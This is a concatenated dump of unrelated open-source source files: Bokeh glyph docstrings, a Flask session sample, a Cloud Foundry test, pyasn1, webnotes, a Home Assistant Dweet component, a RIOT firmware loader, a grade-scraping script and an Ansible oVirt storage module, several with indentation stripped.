.. bokeh-plot:: ../tests/glyphs/Square.py
:source-position: none
*source:* ``tests/glyphs/Square.py``
"""
class SquareCross(Marker):
""" Render square markers with a '+' cross through the center.
Example
-------
.. bokeh-plot:: ../tests/glyphs/SquareCross.py
:source-position: none
*source:* ``tests/glyphs/SquareCross.py``
"""
class SquareX(Marker):
""" Render square markers with an 'X' cross through the center.
Example
-------
.. bokeh-plot:: ../tests/glyphs/SquareX.py
:source-position: none
*source:* ``tests/glyphs/SquareX.py``
"""
class Triangle(Marker):
""" Render triangle markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/Triangle.py
:source-position: none
*source:* ``tests/glyphs/Triangle.py``
"""
class X(Marker):
""" Render a 'X' cross markers.
Example
-------
.. bokeh-plot:: ../tests/glyphs/X.py
:source-position: none
*source:* ``tests/glyphs/X.py``
"""
| bsd-3-clause |
GoogleCloudPlatform/training-data-analyst | self-paced-labs/cloud-hero/sessions/main.py | 2 | 2257 | # Copyright 2019 Google LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import random
from uuid import uuid4
from flask import Flask, make_response, request
from google.cloud import firestore
app = Flask(__name__)
db = firestore.Client()
sessions = db.collection('sessions')
greetings = [
'Hello World',
'Hallo Welt',
'Ciao Mondo',
'Salut le Monde',
'Hola Mundo',
]
@firestore.transactional
def get_session_data(transaction, session_id):
""" Looks up (or creates) the session with the given session_id.
Creates a random session_id if none is provided. Increments
the number of views in this session. Updates are done in a
transaction to make sure no saved increments are overwritten.
"""
if session_id is None:
session_id = str(uuid4()) # Random, unique identifier
doc_ref = sessions.document(document_id=session_id)
doc = doc_ref.get(transaction=transaction)
if doc.exists:
session = doc.to_dict()
else:
session = {
'greeting': random.choice(greetings),
'views': 0
}
session['views'] += 1 # This counts as a view
transaction.set(doc_ref, session)
session['session_id'] = session_id
return session
@app.route('/', methods=['GET'])
def home():
template = '<body>{} views for {}</body>'
transaction = db.transaction()
session = get_session_data(transaction, request.cookies.get('session_id'))
resp = make_response(template.format(
session['views'],
session['greeting']
)
)
resp.set_cookie('session_id', session['session_id'], httponly=True)
return resp
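# Hedged sketch (not part of the deployed sample): exercising the view with
# Flask's test client; this still needs Firestore credentials to run.
def _example_two_views():
    client = app.test_client()
    first = client.get('/')
    second = client.get('/')  # the test client carries the session cookie forward
    return first.data, second.data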
if __name__ == '__main__':
app.run(host='127.0.0.1', port=8080)
| apache-2.0 |
antechrestos/cf-python-client | integration/test_navigation.py | 1 | 3323 | import logging
import unittest
from config_test import build_client_from_configuration
_logger = logging.getLogger(__name__)
class TestNavigation(unittest.TestCase):
def test_all(self):
client = build_client_from_configuration()
for organization in client.v2.organizations:
if organization['metadata']['guid'] == client.org_guid:
for space in organization.spaces():
if space['metadata']['guid'] == client.space_guid:
organization_reloaded = space.organization()
self.assertEqual(organization['metadata']['guid'], organization_reloaded['metadata']['guid'])
for application in space.apps():
if application['metadata']['guid'] == client.app_guid:
space_reloaded = application.space()
self.assertEqual(space['metadata']['guid'], space_reloaded['metadata']['guid'])
application.start()
application.stats()
application.instances()
application.summary()
for _ in application.routes():
break
for _ in application.service_bindings():
break
for _ in application.events():
break
application.stop()
for service_instance in space.service_instances():
space_reloaded = service_instance.space()
self.assertEqual(space['metadata']['guid'], space_reloaded['metadata']['guid'])
for service_binding in service_instance.service_bindings():
service_instance_reloaded = service_binding.service_instance()
self.assertEqual(service_instance['metadata']['guid'],
service_instance_reloaded['metadata']['guid'])
service_binding.app()
break
for route in service_instance.routes():
service_instance_reloaded = route.service_instance()
self.assertEqual(service_instance['metadata']['guid'],
service_instance_reloaded['metadata']['guid'])
for _ in route.apps():
break
space_reloaded = route.space()
self.assertEqual(space['metadata']['guid'], space_reloaded['metadata']['guid'])
break
service_plan = service_instance.service_plan()
for _ in service_plan.service_instances():
break
service = service_plan.service()
for _ in service.service_plans():
break
break
| apache-2.0 |
jymannob/CouchPotatoServer | libs/pyasn1/type/tagmap.py | 200 | 1772 | from pyasn1 import error
class TagMap:
def __init__(self, posMap={}, negMap={}, defType=None):
self.__posMap = posMap.copy()
self.__negMap = negMap.copy()
self.__defType = defType
def __contains__(self, tagSet):
return tagSet in self.__posMap or \
self.__defType is not None and tagSet not in self.__negMap
def __getitem__(self, tagSet):
if tagSet in self.__posMap:
return self.__posMap[tagSet]
elif tagSet in self.__negMap:
raise error.PyAsn1Error('Key in negative map')
elif self.__defType is not None:
return self.__defType
else:
raise KeyError()
def __repr__(self):
s = '%r/%r' % (self.__posMap, self.__negMap)
if self.__defType is not None:
s = s + '/%r' % (self.__defType,)
return s
def clone(self, parentType, tagMap, uniq=False):
if self.__defType is not None and tagMap.getDef() is not None:
raise error.PyAsn1Error('Duplicate default value at %s' % (self,))
if tagMap.getDef() is not None:
defType = tagMap.getDef()
else:
defType = self.__defType
posMap = self.__posMap.copy()
for k in tagMap.getPosMap():
if uniq and k in posMap:
raise error.PyAsn1Error('Duplicate positive key %s' % (k,))
posMap[k] = parentType
negMap = self.__negMap.copy()
negMap.update(tagMap.getNegMap())
return self.__class__(
posMap, negMap, defType,
)
def getPosMap(self): return self.__posMap.copy()
def getNegMap(self): return self.__negMap.copy()
def getDef(self): return self.__defType
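    # Hedged usage sketch (stand-in keys; real pyasn1 code passes tag.TagSet
    # instances as the map keys):
    #   tmap = TagMap(posMap={'t1': 'Integer'}, negMap={'t2': 'Choice'}, defType='Any')
    #   tmap['t1']   -> 'Integer'
    #   tmap['t3']   -> 'Any' (falls through to the default type)
    #   tmap['t2']   -> raises error.PyAsn1Error (negative map entry)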
| gpl-3.0 |
saurabh6790/med_lib_test | webnotes/modules/__init__.py | 32 | 1699 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
Utilities for using modules
"""
import webnotes, os
from webnotes import conf
import webnotes.utils
lower_case_files_for = ['DocType', 'Page', 'Report',
"Workflow", 'Module Def', 'Desktop Item', 'Workflow State', 'Workflow Action']
def scrub(txt):
return txt.replace(' ','_').replace('-', '_').replace('/', '_').lower()
def scrub_dt_dn(dt, dn):
"""Returns in lowercase and code friendly names of doctype and name for certain types"""
ndt, ndn = dt, dn
if dt in lower_case_files_for:
ndt, ndn = scrub(dt), scrub(dn)
return ndt, ndn
def get_module_path(module):
"""Returns path of the given module"""
m = scrub(module)
app_path = webnotes.utils.get_base_path()
if m in ('core', 'website'):
return os.path.join(app_path, 'lib', m)
else:
return os.path.join(app_path, 'app', m)
def get_doc_path(module, doctype, name):
dt, dn = scrub_dt_dn(doctype, name)
return os.path.join(get_module_path(module), dt, dn)
def reload_doc(module, dt=None, dn=None, plugin=None, force=True):
from webnotes.modules.import_file import import_files
return import_files(module, dt, dn, plugin=plugin, force=force)
def export_doc(doctype, name, module=None, plugin=None):
"""write out a doc"""
from webnotes.modules.export_file import write_document_file
import webnotes.model.doc
if not module: module = webnotes.conn.get_value(doctype, name, 'module')
write_document_file(webnotes.model.doc.get(doctype, name), module, plugin=plugin)
def get_doctype_module(doctype):
return webnotes.conn.get_value('DocType', doctype, 'module')
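# Hedged sketch (not part of the framework): scrub_dt_dn lowercases only the
# doctypes listed in lower_case_files_for; everything else passes through.
def _example_scrub():
	assert scrub('Sales Order-2013/A') == 'sales_order_2013_a'
	assert scrub_dt_dn('DocType', 'Sales Order') == ('doctype', 'sales_order')
	assert scrub_dt_dn('Custom Thing', 'My Name') == ('Custom Thing', 'My Name')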
| mit |
Zac-HD/home-assistant | homeassistant/components/dweet.py | 22 | 1948 | """
A component which allows you to send data to Dweet.io.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/dweet/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.const import (
CONF_NAME, CONF_WHITELIST, EVENT_STATE_CHANGED, STATE_UNKNOWN)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import state as state_helper
from homeassistant.util import Throttle
REQUIREMENTS = ['dweepy==0.2.0']
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'dweet'
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=1)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_WHITELIST, default=[]):
vol.All(cv.ensure_list, [cv.entity_id]),
}),
}, extra=vol.ALLOW_EXTRA)
def setup(hass, config):
"""Setup the Dweet.io component."""
conf = config[DOMAIN]
name = conf.get(CONF_NAME)
whitelist = conf.get(CONF_WHITELIST)
json_body = {}
def dweet_event_listener(event):
"""Listen for new messages on the bus and sends them to Dweet.io."""
state = event.data.get('new_state')
if state is None or state.state in (STATE_UNKNOWN, '') \
or state.entity_id not in whitelist:
return
try:
_state = state_helper.state_as_number(state)
except ValueError:
_state = state.state
json_body[state.attributes.get('friendly_name')] = _state
send_data(name, json_body)
hass.bus.listen(EVENT_STATE_CHANGED, dweet_event_listener)
return True
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def send_data(name, msg):
"""Send the collected data to Dweet.io."""
import dweepy
try:
dweepy.dweet_for(name, msg)
except dweepy.DweepyError:
_LOGGER.error("Error saving data '%s' to Dweet.io", msg)
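# A hedged example configuration.yaml entry matching CONFIG_SCHEMA above
# (the name and entity id are placeholders):
#
# dweet:
#   name: my-ha-instance
#   whitelist:
#     - sensor.living_room_temperature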
| apache-2.0 |
okwow123/djangol2 | example/env/lib/python2.7/site-packages/allauth/socialaccount/providers/edmodo/tests.py | 12 | 1147 | from allauth.socialaccount.tests import OAuth2TestsMixin
from allauth.tests import MockedResponse, TestCase
from .provider import EdmodoProvider
class EdmodoTests(OAuth2TestsMixin, TestCase):
provider_id = EdmodoProvider.id
def get_mocked_response(self):
return MockedResponse(200, """
{
"url": "https://api.edmodo.com/users/74721257",
"id": 74721257,
"type": "teacher",
"username": "getacclaim-teacher1",
"user_title": null,
"first_name": "Edmodo Test",
"last_name": "Teacher",
"time_zone": "America/New_York",
"utc_offset": -18000,
"locale": "en",
"gender": null,
"start_level": null,
"end_level": null,
"about": null,
"premium": false,
"school": {"url": "https://api.edmodo.com/schools/559253", "id": 559253},
"verified_institution_member": true,
"coppa_verified": false,
"subjects": null,
"avatars": {
"small":
"https://api.edmodo.com/users/74721257/avatar?type=small&u=670329ncqnf8fxv7tya24byn5",
"large":
"https://api.edmodo.com/users/74721257/avatar?type=large&u=670329ncqnf8fxv7tya24byn5"
},
"email":"test@example.com",
"sync_enabled": false
}
""") # noqa
| mit |
jirikuncar/invenio-deposit | invenio_deposit/fields/author.py | 7 | 1479 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2012, 2013, 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Author field."""
from wtforms import StringField
from ..autocomplete_utils import orcid_authors
from ..field_base import WebDepositField
__all__ = ['AuthorField']
class AuthorField(WebDepositField, StringField):
"""Author form."""
def __init__(self, **kwargs):
"""Deprecated field."""
import warnings
warnings.warn("Field has been deprecated", PendingDeprecationWarning)
defaults = dict(
icon='user',
export_key='authors[0].full_name',
autocomplete=orcid_authors,
widget_classes="form-control"
)
defaults.update(kwargs)
super(AuthorField, self).__init__(**defaults)
| gpl-2.0 |
rusucosmin/courses | ubb/algebra/sort_partial.py | 1 | 2185 | import urllib2
import operator
import os
from bs4 import BeautifulSoup
class Student:
def __init__(self, name, grade):
self._name = name
self._grade = grade
def __repr__(self):
return self._name + " " + str(self._grade)
if not os.path.exists('partial.html'):
response = urllib2.urlopen('https://docs.google.com/spreadsheets/d/1We7B7CbRNWxnR-BrO1t7Dq7J-wDL0MssIBl7tHO-9hc/pubhtml#')
    with open('partial.html', 'w') as f:
        f.write(response.read())  # the with-block closes the file so the read below sees flushed data
with open('partial.html', 'r') as f:
html_doc = f.read()
soup = BeautifulSoup(html_doc, 'html.parser')
div_tag = soup.find_all('div', id = "1864821402")
div_soup = BeautifulSoup(str(div_tag[0].contents), 'html.parser')
empty_cells = div_soup.find_all("td", class_="s5")
for emptycell in empty_cells:
emptycell['class'] = "s4"
empty_cells = div_soup.find_all("td", class_="s3")
for emptycell in empty_cells:
emptycell['class'] = "s2"
empty_cells = div_soup.find_all("td", class_="s10")
for emptycell in empty_cells:
emptycell['class'] = "s2"
empty_cells = div_soup.find_all("td", class_="s11")
for emptycell in empty_cells:
emptycell['class'] = "s4"
all_names = div_soup.find_all("td", class_="s2")
all_grades = div_soup.find_all("td", class_="s4")
all_names = [name for name in all_names if name.getText() != ""]
all_grades = [grade for grade in all_grades if grade.getText() not in ["Pb1", "Pb2", "Pb3", "Pb4", "Total"]]
names = []
grades = []
for i in range(0, len(all_names), 2):
names.append(all_names[i].getText() + " " + all_names[i + 1].getText())
for i in range(4, len(all_grades), 5):
if all_grades[i].getText() == "":
grades.append(0)
else:
grades.append(int(all_grades[i].getText()))
assert(len(grades) == len(names))
students = []
for i in range(min(len(grades), len(names))):
students.append(Student(names[i], grades[i]))
students = sorted(students, key = operator.attrgetter('_grade'), reverse=True)
with open("main.html", 'w') as f:
cnt = 0
for student in students:
cnt += 1
line = str(cnt) + " " + student._name + " " + str(student._grade) + '<br>'
        f.write(line.encode('utf-8'))  # line is already unicode; just encode for the file
f.write('\n')
with open("main.html", 'r') as f:
print(f.read())
| mit |
PeterKietzmann/RIOT | boards/opencm904/dist/robotis-loader.py | 30 | 4057 | #!/usr/bin/env python
'''
MIT License
Copyright (c) 2014 Gregoire Passault
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
# This script sends a program on a robotis board (OpenCM9.04 or CM900)
# using the robotis bootloader (used in OpenCM IDE)
#
# Usage:
# python robotis-loader.py <serial port> <binary>
#
# Example:
# python robotis-loader.py /dev/ttyACM0 firmware.bin
#
# https://github.com/Gregwar/robotis-loader
import serial
import sys
import os
import time
print('~~ Robotis loader ~~')
print('')
print('Please, make sure to connect the USB cable WHILE holding down the "USER SW" button.')
print('Status LED should stay lit and the board should be able to load the program.')
print('')
# Helper function for bytes conversion
if sys.version_info[0] == 3:
def to_ord(val):
return ord(chr(val))
else:
def to_ord(val):
return ord(val)
# Reading command line
if len(sys.argv) != 3:
exit('! Usage: robotis-loader.py <serial-port> <binary>')
pgm, port, binary = sys.argv
def progressBar(percent, precision=65):
"""Prints a progress bar."""
threshold = precision*percent / 100.0
sys.stdout.write('[ ')
for x in range(precision):
if x < threshold:
sys.stdout.write('#')
else:
sys.stdout.write(' ')
sys.stdout.write(' ] ')
sys.stdout.flush()
# Opening the firmware file
try:
stat = os.stat(binary)
size = stat.st_size
firmware = open(binary, 'rb')
print('* Opening %s, size=%d' % (binary, size))
except: # noqa: E722
exit('! Unable to open file %s' % binary)
# Opening serial port
try:
s = serial.Serial(port, baudrate=115200)
except: # noqa: E722
exit('! Unable to open serial port %s' % port)
print('* Resetting the board')
s.setRTS(True)
s.setDTR(False)
time.sleep(0.1)
s.setRTS(False)
s.write(b'CM9X')
s.close()
time.sleep(1.0)
print('* Connecting...')
s = serial.Serial(port, baudrate=115200)
s.write(b'AT&LD')
print('* Download signal transmitted, waiting...')
# Entering bootloader sequence
while True:
line = s.readline().strip()
if line.endswith(b'Ready..'):
print('* Board ready, sending data')
cs = 0
pos = 0
while True:
c = firmware.read(2048)
if len(c):
pos += len(c)
sys.stdout.write("\r")
progressBar(100 * float(pos) / float(size))
s.write(c)
for k in range(0, len(c)):
cs = (cs + to_ord(c[k])) % 256
else:
firmware.close()
break
print('')
s.setDTR(True)
print('* Checksum: %d' % (cs))
import struct
s.write(struct.pack('B', cs))
# s.write('{0}'.format(chr(cs)).encode('ascii'))
print('* Firmware was sent')
else:
if line == b'Success..':
print('* Success, running the code')
print('')
s.write(b'AT&RST')
s.close()
exit()
else:
print('Board -> {}'.format(line))
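# Hedged note (mirrors the transfer loop above): the bootloader checksum is
# simply the firmware's byte sum modulo 256, e.g.:
#   cs = 0
#   for chunk in iter(lambda: firmware.read(2048), b''):
#       cs = (cs + sum(bytearray(chunk))) % 256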
| lgpl-2.1 |
fernandezcuesta/ansible | lib/ansible/modules/cloud/ovirt/ovirt_storage_domains.py | 29 | 18519 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ovirt_storage_domains
short_description: Module to manage storage domains in oVirt/RHV
version_added: "2.3"
author: "Ondra Machacek (@machacekondra)"
description:
- "Module to manage storage domains in oVirt/RHV"
options:
name:
description:
- "Name of the storage domain to manage."
state:
description:
- "Should the storage domain be present/absent/maintenance/unattached"
choices: ['present', 'absent', 'maintenance', 'unattached']
default: present
description:
description:
- "Description of the storage domain."
comment:
description:
- "Comment of the storage domain."
data_center:
description:
- "Data center name where storage domain should be attached."
- "This parameter isn't idempotent, it's not possible to change data center of storage domain."
domain_function:
description:
- "Function of the storage domain."
- "This parameter isn't idempotent, it's not possible to change domain function of storage domain."
choices: ['data', 'iso', 'export']
default: 'data'
aliases: ['type']
host:
description:
- "Host to be used to mount storage."
localfs:
description:
- "Dictionary with values for localfs storage type:"
- "C(path) - Path of the mount point. E.g.: /path/to/my/data"
- "Note that these parameters are not idempotent."
version_added: "2.4"
nfs:
description:
- "Dictionary with values for NFS storage type:"
- "C(address) - Address of the NFS server. E.g.: myserver.mydomain.com"
- "C(path) - Path of the mount point. E.g.: /path/to/my/data"
- "C(version) - NFS version. One of: I(auto), I(v3), I(v4) or I(v4_1)."
- "C(timeout) - The time in tenths of a second to wait for a response before retrying NFS requests. Range 0 to 65535."
- "C(retrans) - The number of times to retry a request before attempting further recovery actions. Range 0 to 65535."
- "Note that these parameters are not idempotent."
iscsi:
description:
- "Dictionary with values for iSCSI storage type:"
- "C(address) - Address of the iSCSI storage server."
- "C(port) - Port of the iSCSI storage server."
- "C(target) - The target IQN for the storage device."
- "C(lun_id) - LUN id(s)."
- "C(username) - A CHAP user name for logging into a target."
- "C(password) - A CHAP password for logging into a target."
- "C(override_luns) - If I(True) ISCSI storage domain luns will be overridden before adding."
- "Note that these parameters are not idempotent."
posixfs:
description:
- "Dictionary with values for PosixFS storage type:"
- "C(path) - Path of the mount point. E.g.: /path/to/my/data"
- "C(vfs_type) - Virtual File System type."
- "C(mount_options) - Option which will be passed when mounting storage."
- "Note that these parameters are not idempotent."
glusterfs:
description:
- "Dictionary with values for GlusterFS storage type:"
- "C(address) - Address of the Gluster server. E.g.: myserver.mydomain.com"
- "C(path) - Path of the mount point. E.g.: /path/to/my/data"
- "C(mount_options) - Option which will be passed when mounting storage."
- "Note that these parameters are not idempotent."
fcp:
description:
- "Dictionary with values for fibre channel storage type:"
- "C(address) - Address of the fibre channel storage server."
- "C(port) - Port of the fibre channel storage server."
- "C(lun_id) - LUN id."
- "Note that these parameters are not idempotent."
destroy:
description:
- "Logical remove of the storage domain. If I(true) retains the storage domain's data for import."
- "This parameter is relevant only when C(state) is I(absent)."
format:
description:
- "If I(True) storage domain will be formatted after removing it from oVirt/RHV."
- "This parameter is relevant only when C(state) is I(absent)."
extends_documentation_fragment: ovirt
'''
EXAMPLES = '''
# Examples don't contain auth parameter for simplicity,
# look at ovirt_auth module to see how to reuse authentication:
# Add data NFS storage domain
- ovirt_storage_domains:
name: data_nfs
host: myhost
data_center: mydatacenter
nfs:
address: 10.34.63.199
path: /path/data
# Add data localfs storage domain
- ovirt_storage_domains:
name: data_localfs
host: myhost
data_center: mydatacenter
localfs:
path: /path/to/data
# Add data iSCSI storage domain:
- ovirt_storage_domains:
name: data_iscsi
host: myhost
data_center: mydatacenter
iscsi:
target: iqn.2016-08-09.domain-01:nickname
lun_id:
- 1IET_000d0001
- 1IET_000d0002
address: 10.34.63.204
# Add data glusterfs storage domain
- ovirt_storage_domains:
name: glusterfs_1
host: myhost
data_center: mydatacenter
glusterfs:
address: 10.10.10.10
path: /path/data
# Import export NFS storage domain:
- ovirt_storage_domains:
domain_function: export
host: myhost
data_center: mydatacenter
nfs:
address: 10.34.63.199
path: /path/export
# Create ISO NFS storage domain
- ovirt_storage_domains:
name: myiso
domain_function: iso
host: myhost
data_center: mydatacenter
nfs:
address: 10.34.63.199
path: /path/iso
# Remove storage domain
- ovirt_storage_domains:
state: absent
name: mystorage_domain
format: true
'''
RETURN = '''
id:
description: ID of the storage domain which is managed
returned: On success if storage domain is found.
type: str
sample: 7de90f31-222c-436c-a1ca-7e655bd5b60c
storage_domain:
description: "Dictionary of all the storage domain attributes. Storage domain attributes can be found on your oVirt/RHV instance
at following url: http://ovirt.github.io/ovirt-engine-api-model/master/#types/storage_domain."
returned: On success if storage domain is found.
type: dict
'''
try:
import ovirtsdk4.types as otypes
from ovirtsdk4.types import StorageDomainStatus as sdstate
except ImportError:
pass
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ovirt import (
BaseModule,
check_sdk,
create_connection,
equal,
get_entity,
ovirt_full_argument_spec,
search_by_name,
wait,
)
class StorageDomainModule(BaseModule):
def _get_storage_type(self):
for sd_type in ['nfs', 'iscsi', 'posixfs', 'glusterfs', 'fcp', 'localfs']:
if self._module.params.get(sd_type) is not None:
return sd_type
def _get_storage(self):
for sd_type in ['nfs', 'iscsi', 'posixfs', 'glusterfs', 'fcp', 'localfs']:
if self._module.params.get(sd_type) is not None:
return self._module.params.get(sd_type)
def _login(self, storage_type, storage):
if storage_type == 'iscsi':
hosts_service = self._connection.system_service().hosts_service()
host = search_by_name(hosts_service, self._module.params['host'])
hosts_service.host_service(host.id).iscsi_login(
iscsi=otypes.IscsiDetails(
username=storage.get('username'),
password=storage.get('password'),
address=storage.get('address'),
target=storage.get('target'),
),
)
def build_entity(self):
storage_type = self._get_storage_type()
storage = self._get_storage()
self._login(storage_type, storage)
return otypes.StorageDomain(
name=self._module.params['name'],
description=self._module.params['description'],
comment=self._module.params['comment'],
type=otypes.StorageDomainType(
self._module.params['domain_function']
),
host=otypes.Host(
name=self._module.params['host'],
),
storage=otypes.HostStorage(
type=otypes.StorageType(storage_type),
logical_units=[
otypes.LogicalUnit(
id=lun_id,
address=storage.get('address'),
port=storage.get('port', 3260),
target=storage.get('target'),
username=storage.get('username'),
password=storage.get('password'),
) for lun_id in (
storage.get('lun_id')
if isinstance(storage.get('lun_id'), list)
else [storage.get('lun_id')]
)
] if storage_type in ['iscsi', 'fcp'] else None,
override_luns=storage.get('override_luns'),
mount_options=storage.get('mount_options'),
vfs_type='glusterfs' if storage_type in ['glusterfs'] else storage.get('vfs_type'),
address=storage.get('address'),
path=storage.get('path'),
nfs_retrans=storage.get('retrans'),
nfs_timeo=storage.get('timeout'),
nfs_version=otypes.NfsVersion(
storage.get('version')
) if storage.get('version') else None,
) if storage_type is not None else None
)
def _attached_sds_service(self):
# Get data center object of the storage domain:
dcs_service = self._connection.system_service().data_centers_service()
dc = search_by_name(dcs_service, self._module.params['data_center'])
if dc is None:
return
dc_service = dcs_service.data_center_service(dc.id)
return dc_service.storage_domains_service()
def _maintenance(self, storage_domain):
attached_sds_service = self._attached_sds_service()
if attached_sds_service is None:
return
attached_sd_service = attached_sds_service.storage_domain_service(storage_domain.id)
attached_sd = get_entity(attached_sd_service)
if attached_sd and attached_sd.status != sdstate.MAINTENANCE:
if not self._module.check_mode:
attached_sd_service.deactivate()
self.changed = True
wait(
service=attached_sd_service,
condition=lambda sd: sd.status == sdstate.MAINTENANCE,
wait=self._module.params['wait'],
timeout=self._module.params['timeout'],
)
def _unattach(self, storage_domain):
attached_sds_service = self._attached_sds_service()
if attached_sds_service is None:
return
attached_sd_service = attached_sds_service.storage_domain_service(storage_domain.id)
attached_sd = get_entity(attached_sd_service)
if attached_sd and attached_sd.status == sdstate.MAINTENANCE:
if not self._module.check_mode:
# Detach the storage domain:
attached_sd_service.remove()
self.changed = True
# Wait until storage domain is detached:
wait(
service=attached_sd_service,
condition=lambda sd: sd is None,
wait=self._module.params['wait'],
timeout=self._module.params['timeout'],
)
def pre_remove(self, storage_domain):
# Before removing storage domain we need to put it into maintenance state:
self._maintenance(storage_domain)
# Before removing storage domain we need to detach it from data center:
self._unattach(storage_domain)
def post_create_check(self, sd_id):
storage_domain = self._service.service(sd_id).get()
self._service = self._attached_sds_service()
# If storage domain isn't attached, attach it:
attached_sd_service = self._service.service(storage_domain.id)
if get_entity(attached_sd_service) is None:
self._service.add(
otypes.StorageDomain(
id=storage_domain.id,
),
)
self.changed = True
# Wait until storage domain is in maintenance:
wait(
service=attached_sd_service,
condition=lambda sd: sd.status == sdstate.ACTIVE,
wait=self._module.params['wait'],
timeout=self._module.params['timeout'],
)
def unattached_pre_action(self, storage_domain):
self._service = self._attached_sds_service(storage_domain)
self._maintenance(self._service, storage_domain)
def update_check(self, entity):
return (
equal(self._module.params['comment'], entity.comment) and
equal(self._module.params['description'], entity.description)
)
def failed_state(sd):
return sd.status in [sdstate.UNKNOWN, sdstate.INACTIVE]
def control_state(sd_module):
sd = sd_module.search_entity()
if sd is None:
return
sd_service = sd_module._service.service(sd.id)
if sd.status == sdstate.LOCKED:
wait(
service=sd_service,
condition=lambda sd: sd.status != sdstate.LOCKED,
fail_condition=failed_state,
)
if failed_state(sd):
raise Exception("Not possible to manage storage domain '%s'." % sd.name)
elif sd.status == sdstate.ACTIVATING:
wait(
service=sd_service,
condition=lambda sd: sd.status == sdstate.ACTIVE,
fail_condition=failed_state,
)
elif sd.status == sdstate.DETACHING:
wait(
service=sd_service,
condition=lambda sd: sd.status == sdstate.UNATTACHED,
fail_condition=failed_state,
)
elif sd.status == sdstate.PREPARING_FOR_MAINTENANCE:
wait(
service=sd_service,
condition=lambda sd: sd.status == sdstate.MAINTENANCE,
fail_condition=failed_state,
)
def main():
argument_spec = ovirt_full_argument_spec(
state=dict(
choices=['present', 'absent', 'maintenance', 'unattached'],
default='present',
),
name=dict(required=True),
description=dict(default=None),
comment=dict(default=None),
data_center=dict(required=True),
domain_function=dict(choices=['data', 'iso', 'export'], default='data', aliases=['type']),
host=dict(default=None),
localfs=dict(default=None, type='dict'),
nfs=dict(default=None, type='dict'),
iscsi=dict(default=None, type='dict'),
posixfs=dict(default=None, type='dict'),
glusterfs=dict(default=None, type='dict'),
fcp=dict(default=None, type='dict'),
destroy=dict(type='bool', default=False),
format=dict(type='bool', default=False),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
check_sdk(module)
try:
auth = module.params.pop('auth')
connection = create_connection(auth)
storage_domains_service = connection.system_service().storage_domains_service()
storage_domains_module = StorageDomainModule(
connection=connection,
module=module,
service=storage_domains_service,
)
state = module.params['state']
control_state(storage_domains_module)
if state == 'absent':
ret = storage_domains_module.remove(
destroy=module.params['destroy'],
format=module.params['format'],
host=module.params['host'],
)
elif state == 'present':
sd_id = storage_domains_module.create()['id']
storage_domains_module.post_create_check(sd_id)
ret = storage_domains_module.action(
action='activate',
action_condition=lambda s: s.status == sdstate.MAINTENANCE,
wait_condition=lambda s: s.status == sdstate.ACTIVE,
fail_condition=failed_state,
)
elif state == 'maintenance':
sd_id = storage_domains_module.create()['id']
storage_domains_module.post_create_check(sd_id)
ret = storage_domains_module.action(
action='deactivate',
action_condition=lambda s: s.status == sdstate.ACTIVE,
wait_condition=lambda s: s.status == sdstate.MAINTENANCE,
fail_condition=failed_state,
)
elif state == 'unattached':
ret = storage_domains_module.create()
storage_domains_module.pre_remove(
storage_domain=storage_domains_service.service(ret['id']).get()
)
ret['changed'] = storage_domains_module.changed
module.exit_json(**ret)
except Exception as e:
module.fail_json(msg=str(e), exception=traceback.format_exc())
